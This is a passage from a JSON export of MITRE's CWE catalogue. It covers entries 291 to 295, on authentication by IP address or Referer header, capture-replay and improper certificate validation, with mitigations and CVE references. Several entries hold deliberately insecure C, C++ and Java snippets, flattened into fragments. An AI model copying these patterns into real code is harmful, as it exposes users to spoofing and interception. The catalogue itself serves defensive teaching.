Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"291":{"attr":{"@_ID":"291","@_Name":"Reliance on IP Address for Authentication","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses an IP address for authentication.","Extended_Description":"IP addresses can be easily spoofed. Attackers can forge the source IP address of the packets they send, but response packets will return to the forged IP address. To see the response packets, the attacker has to sniff the traffic between the victim machine and the forged IP address. In order to accomplish the required sniffing, attackers typically attempt to locate themselves on the same subnet as the victim machine. Attackers may be able to circumvent this requirement by using source routing, but source routing is disabled across much of the Internet today. In summary, IP address verification can be a useful part of an authentication scheme, but it should not be the single factor required for authentication.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"290","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"923","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"471","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Access Control","Non-Repudiation"],"Impact":["Hide Activities","Gain Privileges or Assume Identity"],"Note":"Malicious users can fake authentication information, impersonating any IP address."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Use other means of identity verification that cannot be simply spoofed. Possibilities include a username/password or certificate."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-99"},"Intro_Text":"Both of these examples check if a request is from a trusted address before responding to the request.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"sd = socket(AF_INET, SOCK_DGRAM, 0);serv.sin_family = AF_INET;serv.sin_addr.s_addr = htonl(INADDR_ANY);servr.sin_port = htons(1008);bind(sd, (struct sockaddr *) &amp; serv, sizeof(serv));while (1) {}","xhtml:br":["","","","","",""],"xhtml:div":{"#text":"memset(msg, 0x0, MAX_MSG);clilen = sizeof(cli);if (inet_ntoa(cli.sin_addr)==getTrustedAddress()) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"n = recvfrom(sd, msg, MAX_MSG, 0, (struct sockaddr *) &amp; cli, &amp;clilen);","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"while(true) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"DatagramPacket rp=new DatagramPacket(rData,rData.length);outSock.receive(rp);String in = new String(p.getData(),0, rp.getLength());InetAddress clientIPAddress = rp.getAddress();int port = rp.getPort();if (isTrustedAddress(clientIPAddress) &amp; secretKey.equals(in)) {}","xhtml:br":["","","","","",""],"xhtml:div":{"#text":"out = secret.getBytes();DatagramPacket sp =new DatagramPacket(out,out.length, IPAddress, port); outSock.send(sp);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}}],"Body_Text":"The code only verifies the address as stored in the request packet. An attacker can spoof this address, thus impersonating a trusted client."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Trusting self-reported IP address"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"4"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-06-23","Modification_Importance":"Critical","Modification_Comment":"Changed type from composite to weakness."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Description, Name, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Trusting Self-reported IP Address","attr":{"@_Date":"2013-07-17"}}}},"292":{"attr":{"@_ID":"292","@_Name":"DEPRECATED: Trusting Self-reported DNS Name","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated because it was a duplicate of CWE-350. All content has been transferred to CWE-350.","Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-06-23","Modification_Importance":"Critical","Modification_Comment":"CWE-247 and CWE-292 deprecated and merged into CWE-350 to address duplicates."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, Observed_Examples, Other_Notes, Potential_Mitigations, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Likelihood_of_Exploit, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Name"}],"Previous_Entry_Name":[{"#text":"Trusting Self-reported DNS Name","attr":{"@_Date":"2013-07-17"}},{"#text":"DEPRECATED (Duplicate): Trusting Self-reported DNS Name","attr":{"@_Date":"2021-07-20"}}]}},"293":{"attr":{"@_ID":"293","@_Name":"Using Referer Field for Authentication","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The referer field in HTTP requests can be easily modified and, as such, is not a valid means of message integrity checking.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"290","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"The referer field in HTML requests can be simply modified by malicious users, rendering it useless as a means of checking the validity of the request in question."},"Alternate_Terms":{"Alternate_Term":{"Term":"referrer","Description":"While the proper spelling might be regarded as \\"referrer,\\" the HTTP RFCs and their implementations use \\"referer,\\" so this is regarded as the correct spelling."}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"Actions, which may not be authorized otherwise, can be carried out as if they were validated by the server referred to."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"In order to usefully check if a given action is authorized, some means of strong authentication and method protection must be used. Use other means of authorization that cannot be simply spoofed. Possibilities include a username/password or certificate."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code samples check a packet\'s referer in order to decide whether or not an inbound request is from a trusted host.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"String trustedReferer = \\"http://www.example.com/\\"while(true){}","xhtml:br":"","xhtml:div":{"#text":"n = read(newsock, buffer, BUFSIZE);requestPacket = processPacket(buffer, n);if (requestPacket.referer == trustedReferer){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"openNewSecureSession(requestPacket);","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"boolean processConnectionRequest(HttpServletRequest request){}","xhtml:div":{"#text":"String referer = request.getHeader(\\"referer\\")String trustedReferer = \\"http://www.example.com/\\"if(referer.equals(trustedReferer)){}else{}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":[{"#text":"openPrivilegedConnection(request);return true;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"sendPrivilegeError(request);return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}],"Body_Text":"These examples check if a request is from a trusted referer before responding to a request, but the code only verifies the referer name as stored in the request packet. An attacker can spoof the referer, thus impersonating a trusted client."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Using referrer field for authentication"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP29","Entry_Name":"Faulty endpoint authentication"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 17, &#34;Referer Request Header&#34;, Page 1030"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Background_Details, Common_Consequences, Relationships, Relevant_Properties, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References"}]}},"294":{"attr":{"@_ID":"294","@_Name":"Authentication Bypass by Capture-replay","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A capture-replay flaw exists when the design of the software makes it possible for a malicious user to sniff network traffic and bypass authentication by replaying it to the server in question to the same effect as the original message (or with minor changes).","Extended_Description":"Capture-replay attacks are common and can be difficult to defeat without cryptography. They are a subset of network injection attacks that rely on observing previously-sent valid commands, then changing them slightly if necessary and resending the same commands to the server.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"Messages sent with a capture-relay attack allow access to resources which are not otherwise accessible without proper authentication."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Utilize some sequence or time stamping functionality along with a checksum which takes this into account in order to ensure that messages can be parsed only once."},{"Phase":"Architecture and Design","Description":"Since any attacker who can listen to traffic can see sequence numbers, it is necessary to sign messages with some kind of cryptography to ensure that sequence numbers are not simply doctored along with content."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-3435","Description":"product authentication succeeds if user-provided MD5 hash matches the hash in its database; this can be subjected to replay attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3435"},{"Reference":"CVE-2007-4961","Description":"Chain: cleartext transmission of the MD5 hash of password (CWE-319) enables attacks against a server that is susceptible to replay (CWE-294).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4961"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Authentication bypass by replay"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Capture-replay"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"102"}},{"attr":{"@_CAPEC_ID":"509"}},{"attr":{"@_CAPEC_ID":"555"}},{"attr":{"@_CAPEC_ID":"561"}},{"attr":{"@_CAPEC_ID":"60"}},{"attr":{"@_CAPEC_ID":"644"}},{"attr":{"@_CAPEC_ID":"645"}},{"attr":{"@_CAPEC_ID":"652"}},{"attr":{"@_CAPEC_ID":"94"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"295":{"attr":{"@_ID":"295","@_Name":"Improper Certificate Validation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not validate, or incorrectly validates, a certificate.","Extended_Description":"When a certificate is invalid or malicious, it might allow an attacker to spoof a trusted entity by interfering in the communication path between the host and client. The software might connect to a malicious host while believing it is a trusted host, or the software might be deceived into accepting spoofed data that appears to originate from a trusted host.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"322","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"A certificate is a token that associates an identity (principal) to a cryptographic key. Certificates can be used to check if a public key belongs to the assumed owner."},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Implementation","Note":"When the software uses certificate pinning, the developer might not properly validate all relevant components of the certificate before pinning the certificate. This can make it difficult or expensive to test after the pinning is complete."}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Authentication"],"Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"]}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Web Application Scanner"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Man-in-the-middle attack tool"}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Implementation"],"Description":"Certificates should be carefully managed and checked to assure that data are encrypted with the intended owner\'s public key."},{"Phase":"Implementation","Description":"If certificate pinning is being used, ensure that all relevant properties of the certificate are fully validated before the certificate is pinned, including the hostname."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-121"},"Intro_Text":"This code checks the certificate of a connected peer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if ((cert = SSL_get_peer_certificate(ssl)) &amp;&amp; host)if ((X509_V_OK==foo) || X509_V_ERR_SELF_SIGNED_CERT_IN_CHAIN==foo))","xhtml:div":[{"#text":"foo=SSL_get_verify_result(ssl);","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// certificate looks good, host can be trusted"}}],"xhtml:br":""}},"Body_Text":"In this case, because the certificate is self-signed, there was no external authority that could prove the identity of the host. The program could be communicating with a different system that is spoofing the host, e.g. by poisoning the DNS cache or using an Adversary-in-the-Middle (AITM) attack to modify the traffic from server to client."},{"attr":{"@_Demonstrative_Example_ID":"DX-122"},"Intro_Text":"The following OpenSSL code obtains a certificate and verifies it.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"cert = SSL_get_peer_certificate(ssl);if (cert &amp;&amp; (SSL_get_verify_result(ssl)==X509_V_OK)) {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// do secret things"}}}},"Body_Text":"Even though the \\"verify\\" step returns X509_V_OK, this step does not include checking the Common Name against the name of the host. That is, there is no guarantee that the certificate is for the desired host. The SSL connection could have been established with a malicious host that provided a valid certificate."},{"attr":{"@_Demonstrative_Example_ID":"DX-123"},"Intro_Text":"The following OpenSSL code ensures that there is a certificate and allows the use of expired certificates.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if (cert = SSL_get_peer(certificate(ssl)) {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"foo=SSL_get_verify_result(ssl);if ((X509_V_OK==foo) || (X509_V_ERR_CERT_HAS_EXPIRED==foo))","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"//do stuff"}}}}}},"Body_Text":"If the call to SSL_get_verify_result() returns X509_V_ERR_CERT_HAS_EXPIRED, this means that the certificate has expired. As time goes on, there is an increasing chance for attackers to compromise the certificate."},{"attr":{"@_Demonstrative_Example_ID":"DX-124"},"Intro_Text":"The following OpenSSL code ensures that there is a certificate before continuing execution.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if (cert = SSL_get_peer_certificate(ssl)) {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// got a certificate, do secret things"}}}},"Body_Text":"Because this code does not use SSL_get_verify_results() to check the certificate, it could accept certificates that have been revoked (X509_V_ERR_CERT_REVOKED). The software could be communicating with a malicious host."},{"attr":{"@_Demonstrative_Example_ID":"DX-125"},"Intro_Text":"The following OpenSSL code ensures that the host has a certificate.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if (cert = SSL_get_peer_certificate(ssl)) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["","","","","",""],"xhtml:i":["// got certificate, host can be trusted","//foo=SSL_get_verify_result(ssl);","//if (X509_V_OK==foo) ..."]}}}},"Body_Text":"Note that the code does not call SSL_get_verify_result(ssl), which effectively disables the validation step that checks the certificate."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2014-1266","Description":"chain: incorrect \\"goto\\" in Apple SSL product bypasses certificate validation, allowing Adversary-in-the-Middle (AITM) attack (Apple \\"goto fail\\" bug). CWE-705 (Incorrect Control Flow Scoping) -&gt; CWE-561 (Dead Code) -&gt; CWE-295 (Improper Certificate Validation) -&gt; CWE-393 (Return of Wrong Status Code) -&gt; CWE-300 (Channel Accessible by Non-Endpoint).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1266"},{"Reference":"CVE-2021-22909","Description":"Chain: router\'s firmware update procedure uses curl with \\"-k\\" (insecure) option that disables certificate validation (CWE-295), allowing adversary-in-the-middle (AITM) compromise with a malicious firmware image (CWE-494).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22909"},{"Reference":"CVE-2008-4989","Description":"Verification function trusts certificate chains in which the last certificate is self-signed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4989"},{"Reference":"CVE-2012-5821","Description":"Web browser uses a TLS-related function incorrectly, preventing it from verifying that a server\'s certificate is signed by a trusted certification authority (CA)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5821"},{"Reference":"CVE-2009-3046","Description":"Web browser does not check if any intermediate certificates are revoked.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3046"},{"Reference":"CVE-2011-0199","Description":"Operating system does not check Certificate Revocation List (CRL) in some cases, allowing spoofing using a revoked certificate.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0199"},{"Reference":"CVE-2012-5810","Description":"Mobile banking application does not verify hostname, leading to financial loss.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5810"},{"Reference":"CVE-2012-3446","Description":"Cloud-support library written in Python uses incorrect regular expression when matching hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3446"},{"Reference":"CVE-2009-2408","Description":"Web browser does not correctly handle \'\\\\0\' character (NUL) in Common Name, allowing spoofing of https sites.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2408"},{"Reference":"CVE-2012-2993","Description":"Smartphone device does not verify hostname, allowing spoofing of mail services.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2993"},{"Reference":"CVE-2012-5822","Description":"Application uses third-party library that does not validate hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5822"},{"Reference":"CVE-2012-5819","Description":"Cloud storage management application does not validate hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5819"},{"Reference":"CVE-2012-5817","Description":"Java library uses JSSE SSLSocket and SSLEngine classes, which do not verify the 